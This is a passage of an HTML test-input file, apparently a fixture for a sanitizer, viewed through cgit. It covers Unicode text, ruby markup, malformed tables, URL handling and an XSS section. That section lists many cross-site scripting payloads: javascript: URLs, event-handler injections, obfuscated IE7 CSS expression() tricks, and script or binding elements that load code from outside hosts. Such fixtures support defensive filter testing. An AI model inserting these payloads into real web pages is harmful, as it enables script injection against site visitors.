301გთხოვთ ახლავე გაიაროთ რეგისტრაცია<br /> 301გთხოვთ ახლავე გაიაროთ რეგისტრაცია<br />
302večjezično računalništvo<br /> 302večjezično računalništvo<br />
303<a title="อ.อ่าง">อ.อ่าง</a><br /> 303<a title="อ.อ่าง">อ.อ่าง</a><br />
304<a title="הירשמו 304<a title="הירשמו
305כעת לכנס ">Зарегистрируйтесь сейчас 305כעת לכנס ">Зарегистрируйтесь сейчас
306на Десятую Международную Конференцию по</a><br /> 306на Десятую Международную Конференцию по</a><br />
307(this file should have utf-8 encoding; some characters may not be displayed because of missing fonts, etc.) 307(this file should have utf-8 encoding; some characters may not be displayed because of missing fonts, etc.)
308 308
309<h6>Non-English text-2: entities</h6> 309<h6>Non-English text-2: entities</h6>
310 310
311&#29992;&#32479;&#19968;&#30721;<br /> 311&#29992;&#32479;&#19968;&#30721;<br />
312&#4306;&#4311;&#4334;&#4317;&#4309;&#4311;<br /> 312&#4306;&#4311;&#4334;&#4317;&#4309;&#4311;<br />
313Inscreva-se agora para a D&#233;cima Confer&#234;ncia Internacional Sobre O Unicode, realizada entre os dias 10 e 12 de mar&#231;o de 1997 em Mainz 313Inscreva-se agora para a D&#233;cima Confer&#234;ncia Internacional Sobre O Unicode, realizada entre os dias 10 e 12 de mar&#231;o de 1997 em Mainz
314na Alemanha. 314na Alemanha.
315 315
316<h6>Ruby</h6> 316<h6>Ruby</h6>
317 317
318(need compatible browser)<br /> 318(need compatible browser)<br />
319<ruby xml:lang="ja"> 319<ruby xml:lang="ja">
320 <rbc> 320 <rbc>
321 <rb>斎</rb> 321 <rb>斎</rb>
322 <rb>藤</rb> 322 <rb>藤</rb>
323 <rb>信</rb> 323 <rb>信</rb>
324 <rb>男</rb> 324 <rb>男</rb>
325 </rbc> 325 </rbc>
326 <rtc class="reading"> 326 <rtc class="reading">
327 <rt>さい</rt> 327 <rt>さい</rt>
328 <rt>とう</rt> 328 <rt>とう</rt>
329 <rt>のぶ</rt> 329 <rt>のぶ</rt>
330 <rt>お</rt> 330 <rt>お</rt>
331 </rtc> 331 </rtc>
332 <rtc class="annotation"> 332 <rtc class="annotation">
333 <rt rbspan="4" xml:lang="en">W3C Associate Chairman</rt> 333 <rt rbspan="4" xml:lang="en">W3C Associate Chairman</rt>
334 </rtc> 334 </rtc>
335</ruby><br /> 335</ruby><br />
336<ruby> 336<ruby>
337 <rb>WWW</rb> 337 <rb>WWW</rb>
338 <rp>(</rp><rt>World Wide Web</rt><rp>)</rp> 338 <rp>(</rp><rt>World Wide Web</rt><rp>)</rp>
339</ruby><br /> 339</ruby><br />
340<ruby> 340<ruby>
341 A 341 A
342 <rp>(</rp><rt>aaa</rt><rp>)</rp> 342 <rp>(</rp><rt>aaa</rt><rp>)</rp>
343</ruby> 343</ruby>
344 344
345 345
346<h6>Tables</h6> 346<h6>Tables</h6>
347 347
348<strong>Omitted closing tags:</strong> <table> 348<strong>Omitted closing tags:</strong> <table>
349<colgroup><col style="x" /><col style="y" /> 349<colgroup><col style="x" /><col style="y" />
350<thead> 350<thead>
351<tr><th>h1c1<th>h1c2 351<tr><th>h1c1<th>h1c2
352<tbody> 352<tbody>
353<tr><td>r1c1<td>r1c2 353<tr><td>r1c1<td>r1c2
354<tr><td>r2c1<td>r2c2 354<tr><td>r2c1<td>r2c2
355</table><br /> 355</table><br />
356<strong>Nested, omitted closing tags:</strong> <table> 356<strong>Nested, omitted closing tags:</strong> <table>
357<colgroup><col style="x" /><col style="y" /> 357<colgroup><col style="x" /><col style="y" />
358<thead> 358<thead>
359<tr><th>h1c1<th>h1c2 359<tr><th>h1c1<th>h1c2
360<tbody> 360<tbody>
361<tr><td>r1c1<td>r1c2<table> 361<tr><td>r1c1<td>r1c2<table>
362<colgroup><col style="x" /><col style="y" /> 362<colgroup><col style="x" /><col style="y" />
363<thead> 363<thead>
364<tr><th>h1c1<th>h1c2 364<tr><th>h1c1<th>h1c2
365<tbody> 365<tbody>
366<tr><td>r1c1<td>r1c2 366<tr><td>r1c1<td>r1c2
367<tr><td>r2c1<td>r2c2 367<tr><td>r2c1<td>r2c2
368</table> 368</table>
369<tr><td>r2c1<td>r2c2 369<tr><td>r2c1<td>r2c2
370</table><br /> 370</table><br />
371 371
372<h6>Tag transformation</h6> 372<h6>Tag transformation</h6>
373<strong>Font element with malicious code:</strong> <p><font color="z-index:123;width:100%;height:100%;position:fixed;top:0;left:0;background-size:cover;background-attachment:fixed;background-image:url(https://i.imgur.com/VQ30s65.png)"></font></p><br /> 373<strong>Font element with malicious code:</strong> <p><font color="z-index:123;width:100%;height:100%;position:fixed;top:0;left:0;background-size:cover;background-attachment:fixed;background-image:url(https://i.imgur.com/VQ30s65.png)"></font></p><br />
374<strong>Font element intended as 'inline' element:</strong> <p><font color='red'>hi</font></p><br /> 374<strong>Font element intended as 'inline' element:</strong> <p><font color='red'>hi</font></p><br />
375<strong>Font element intended as 'block' element:</strong> <div><font color='red'><div>hi</div></font></div><br /> 375<strong>Font element intended as 'block' element:</strong> <div><font color='red'><div>hi</div></font></div><br />
376<strong>Font element intended as 'block' element:</strong> <center><font color='red' face="serif, 'Times'"><div>hi</div><div>QQQ</div></font></center><br /> 376<strong>Font element intended as 'block' element:</strong> <center><font color='red' face="serif, 'Times'"><div>hi</div><div>QQQ</div></font></center><br />
377 377
378<h6>Tidy</h6> 378<h6>Tidy</h6>
379<strong>White-space handling:</strong> abc<em> def </em> ghi abc <em>def</em> ghi 379<strong>White-space handling:</strong> abc<em> def </em> ghi abc <em>def</em> ghi
380 380
381<h6>URLs</h6> 381<h6>URLs</h6>
382 382
383<strong>Relative and absolute:</strong> <a href="mailto:x"></a>, <a href="http://a.com/b/c/d.f"></a>, <a href="./../d.f"></a>, <a href="./d.f"></a>, <a href="d.f"></a>, <a href="#s"></a>, <a href="./../../d.f#s"></a><br /> 383<strong>Relative and absolute:</strong> <a href="mailto:x"></a>, <a href="http://a.com/b/c/d.f"></a>, <a href="./../d.f"></a>, <a href="./d.f"></a>, <a href="d.f"></a>, <a href="#s"></a>, <a href="./../../d.f#s"></a><br />
384(try base URL value of 'http://a.com/b/')<br /> 384(try base URL value of 'http://a.com/b/')<br />
385<strong>CSS URLs:</strong> <div style="background-image: url('a.gif');"></div>, <div style="background-image: URL(&quot;a.gif&quot;);"></div>, <div style="background-image: url('http://a.com/a.gif');"></div>, <div style="background-image: url('./../a.gif');"></div>, <div style="background-image: &#117;r&#x6C;('js&#58;xss'&#x29;"></div><br /> 385<strong>CSS URLs:</strong> <div style="background-image: url('a.gif');"></div>, <div style="background-image: URL(&quot;a.gif&quot;);"></div>, <div style="background-image: url('http://a.com/a.gif');"></div>, <div style="background-image: url('./../a.gif');"></div>, <div style="background-image: &#117;r&#x6C;('js&#58;xss'&#x29;"></div><br />
386<strong>Double URLs:</strong> <a style="behaviour: url(foo) url(http://example.com/xss.htc)">b</a><br /> 386<strong>Double URLs:</strong> <a style="behaviour: url(foo) url(http://example.com/xss.htc)">b</a><br />
387<strong>Anti-spam:</strong> (try regex for 'http://a.com', etc.) <a href="mailto:x@y.com"></a>, <a href="http://a.com/b@d.f"></a>, <a href="a.com/d.f" rel="nofollow"></a>, <a href="a.com/d.f" rel="1, 2"></a>, <a href="a.com/d.f"></a>, <a href="b.com/d.f"></a>, <a href="c.com/d.f">, <a href="denied:http://c.com/d.f"></a><br /> 387<strong>Anti-spam:</strong> (try regex for 'http://a.com', etc.) <a href="mailto:x@y.com"></a>, <a href="http://a.com/b@d.f"></a>, <a href="a.com/d.f" rel="nofollow"></a>, <a href="a.com/d.f" rel="1, 2"></a>, <a href="a.com/d.f"></a>, <a href="b.com/d.f"></a>, <a href="c.com/d.f">, <a href="denied:http://c.com/d.f"></a><br />
388<strong>Soft-hyphen:</strong> <a href="http://q=ídis­c">ídis­c</a> 388<strong>Soft-hyphen:</strong> <a href="http://q=ídis­c">ídis­c</a>
389 389
390<h6>XSS</h6> 390<h6>XSS</h6>
391 391
392<img alt="<img onmouseover=confirm(1)//"<""> 392<img alt="<img onmouseover=confirm(1)//"<"">
393'';!--"<xss>=&{()}<br /> 393'';!--"<xss>=&{()}<br />
394<img src="javascript%3Aalert('xss');" /><br /> 394<img src="javascript%3Aalert('xss');" /><br />
395<img src="javascript:alert('xss');" /><br /> 395<img src="javascript:alert('xss');" /><br />
396<img src="java script:alert('xss');" /><br /> 396<img src="java script:alert('xss');" /><br />
397<img 397<img
398src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41; /><br /> 398src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41; /><br />
399<font color='#FF6699"onmouseover="alert(1)//'>test</font> 399<font color='#FF6699"onmouseover="alert(1)//'>test</font>
400<font color='<img//onerror="alert`www.ptsecurity.com`"src=Psych0tr1a'> 400<font color='<img//onerror="alert`www.ptsecurity.com`"src=Psych0tr1a'>
401<div style="javascript:alert('xss');"></div><br /> 401<div style="javascript:alert('xss');"></div><br />
402<div style="background-image:url(javascript:alert('xss'));"></div><br /> 402<div style="background-image:url(javascript:alert('xss'));"></div><br />
403<div style="background-image:url(&quot;javascript:alert('xss')&quot; );"></div><br /> 403<div style="background-image:url(&quot;javascript:alert('xss')&quot; );"></div><br />
404<!--[if gte IE 4]><script>alert('xss');</script><![endif]--><br /> 404<!--[if gte IE 4]><script>alert('xss');</script><![endif]--><br />
405<script a=">" src="http://ha.ckers.org/xss.js"></script><br /> 405<script a=">" src="http://ha.ckers.org/xss.js"></script><br />
406<div style="background-image: &#117;r&#x6C;('js&#58;xss'&#x29;"></div><br /> 406<div style="background-image: &#117;r&#x6C;('js&#58;xss'&#x29;"></div><br />
407<a style=";-moz-binding:url(http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br /> 407<a style=";-moz-binding:url(http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
408<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert 408<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert
409%28%27xss%3f%29%29">x</a><br /> 409%28%27xss%3f%29%29">x</a><br />
410<strong>Opera:</strong> <a href="\xE2\x80\x83javascript:alert(123)">link</a> 410<strong>Opera:</strong> <a href="\xE2\x80\x83javascript:alert(123)">link</a>
411<strong>Bad IE7:</strong> <a style=color:expr/*comment*/ession(alert(document.domain))>xxx</a><br /> 411<strong>Bad IE7:</strong> <a style=color:expr/*comment*/ession(alert(document.domain))>xxx</a><br />
412<strong>Bad IE7:</strong> <a href="xxx" style="background: exp&#x72;ession(alert('xss'));">xxx</a><br /> 412<strong>Bad IE7:</strong> <a href="xxx" style="background: exp&#x72;ession(alert('xss'));">xxx</a><br />
413<strong>Bad IE7:</strong> <a href="xxx" style="background: &#101;xpression(alert('xss'));">xxx</a><br /> 413<strong>Bad IE7:</strong> <a href="xxx" style="background: &#101;xpression(alert('xss'));">xxx</a><br />
414<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br /> 414<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
415<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/expression(alert('xss'));">xxx</a><br /> 415<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/expression(alert('xss'));">xxx</a><br />
416<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/&#69;xpression(alert('xss'));">xxx</a><br /> 416<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/&#69;xpression(alert('xss'));">xxx</a><br />
417<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Exp&#x72;ession(alert('xss'));">xxx</a><br /> 417<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Exp&#x72;ession(alert('xss'));">xxx</a><br />
418<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br /> 418<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
419<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/* */ression(alert('xss'));">xxx</a><br /> 419<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/* */ression(alert('xss'));">xxx</a><br />
420<strong>Bad IE7:</strong> <a href="xxx" style="background: exp /* */ression(alert('xss'));">xxx</a><br /> 420<strong>Bad IE7:</strong> <a href="xxx" style="background: exp /* */ression(alert('xss'));">xxx</a><br />
421<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br /> 421<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
422<strong>Bad IE7:</strong> <a href="xxx" style="background:/* x */expression(alert('xss'));">xxx</a><br /> 422<strong>Bad IE7:</strong> <a href="xxx" style="background:/* x */expression(alert('xss'));">xxx</a><br />
423<strong>Bad IE7:</strong> <a href="xxx" style="background:/* */ */expression(alert('xss'));">xxx</a><br /> 423<strong>Bad IE7:</strong> <a href="xxx" style="background:/* */ */expression(alert('xss'));">xxx</a><br />
424<strong>Bad IE7:</strong> <a href="x" style="width: /****/**;;;;;;*/expression/**/(alert('xss'));">x</a><br /> 424<strong>Bad IE7:</strong> <a href="x" style="width: /****/**;;;;;;*/expression/**/(alert('xss'));">x</a><br />
425<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background:/**/expression(alert('xss'));">x</a><br /> 425<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background:/**/expression(alert('xss'));">x</a><br />
426<strong>Bad IE7:</strong> <a href="x" style="background: huh /* */ */expression(alert('xss'));">x</a><br /> 426<strong>Bad IE7:</strong> <a href="x" style="background: huh /* */ */expression(alert('xss'));">x</a><br />
427<strong>Bad IE7:</strong> <a href="x" style="background:/**/expression(alert('xss'));background:/**/expression(alert('xss'));">x</a><br /> 427<strong>Bad IE7:</strong> <a href="x" style="background:/**/expression(alert('xss'));background:/**/expression(alert('xss'));">x</a><br />
428<strong>Bad IE7:</strong> exp/*<a style='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>x</a><br /> 428<strong>Bad IE7:</strong> exp/*<a style='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>x</a><br />
429<strong>Bad IE7:</strong> <a style="background:&#69;xpre\ssion(alert('xss'));">hi</a><br /> 429<strong>Bad IE7:</strong> <a style="background:&#69;xpre\ssion(alert('xss'));">hi</a><br />
430<strong>Bad IE7:</strong> <a style="background:expre&#x5c;ssion(alert('xss'));">hi</a><br /> 430<strong>Bad IE7:</strong> <a style="background:expre&#x5c;ssion(alert('xss'));">hi</a><br />
431<strong>Bad IE7:</strong> <a style="color: \0065 \0078 \0070 \0072 \0065 \0073 \0073 \0069 \006f \006e \0028 \0061 \006c \0065 \0072 \0074 \0028 \0031 \0029 \0029">test</a><br /> 431<strong>Bad IE7:</strong> <a style="color: \0065 \0078 \0070 \0072 \0065 \0073 \0073 \0069 \006f \006e \0028 \0061 \006c \0065 \0072 \0074 \0028 \0031 \0029 \0029">test</a><br />
432<strong>Bad IE7:</strong> <a style="xss:e&#92;&#48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br /> 432<strong>Bad IE7:</strong> <a style="xss:e&#92;&#48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
433<strong>Bad IE7:</strong> <a style="background:url('java 433<strong>Bad IE7:</strong> <a style="background:url('java
434script:eval(document.all.mycode.expr)')">hi</a><br /> 434script:eval(document.all.mycode.expr)')">hi</a><br />
435 435
436<h6>Other</h6> 436<h6>Other</h6>
437 437
4383 < 4 <br /> 4383 < 4 <br />
4393 > 4 <br /> 4393 > 4 <br />
440 > 3 <br /> 440 > 3 <br />
441<._.> hi! <br /> 441<._.> hi! <br />
442<<< ALERT >>> <br /> 442<<< ALERT >>> <br />
443<![if !vml]> some stuff <![endif]> <br /> 443<![if !vml]> some stuff <![endif]> <br />
444<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /> <br /> 444<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /> <br />
445<uml:ns ns = "urn:www"> <br /> 445<uml:ns ns = "urn:www"> <br />
446<uml:ns ns = 'urn:www'> <br /> 446<uml:ns ns = 'urn:www'> <br />
447if(13<age AND 21>age){say 'teen'} <br /> 447if(13<age AND 21>age){say 'teen'} <br />
448age >51 and a smoking history of >51 pack-years <b>was</b> <br /> 448age >51 and a smoking history of >51 pack-years <b>was</b> <br />
449age > 51 and a smoking history of >51 pack-years <b>was</b> <br /> 449age > 51 and a smoking history of >51 pack-years <b>was</b> <br />
450age <51 and a smoking history of <51 pack-years <b>was</b> <br /> 450age <51 and a smoking history of <51 pack-years <b>was</b> <br />
451age < 51 and a smoking history of < 51 pack-years <b>was</b> <br /> 451age < 51 and a smoking history of < 51 pack-years <b>was</b> <br />
452<b>age >51 and a smoking history of >51 pack-years</b> <br /> 452<b>age >51 and a smoking history of >51 pack-years</b> <br />
453<b>age > 51 and a smoking history of >51 pack-years</b> <br /> 453<b>age > 51 and a smoking history of >51 pack-years</b> <br />
454<b>age <51 and a smoking history of <51 pack-years</b> <br /> 454<b>age <51 and a smoking history of <51 pack-years</b> <br />
455<b>age < 51 and a smoking history of < 51 pack-years</b> <br /> 455<b>age < 51 and a smoking history of < 51 pack-years</b> <br />
generated by cgit v1.2.3 (git 2.25.1) at 2025-08-19 14:10:43 +0000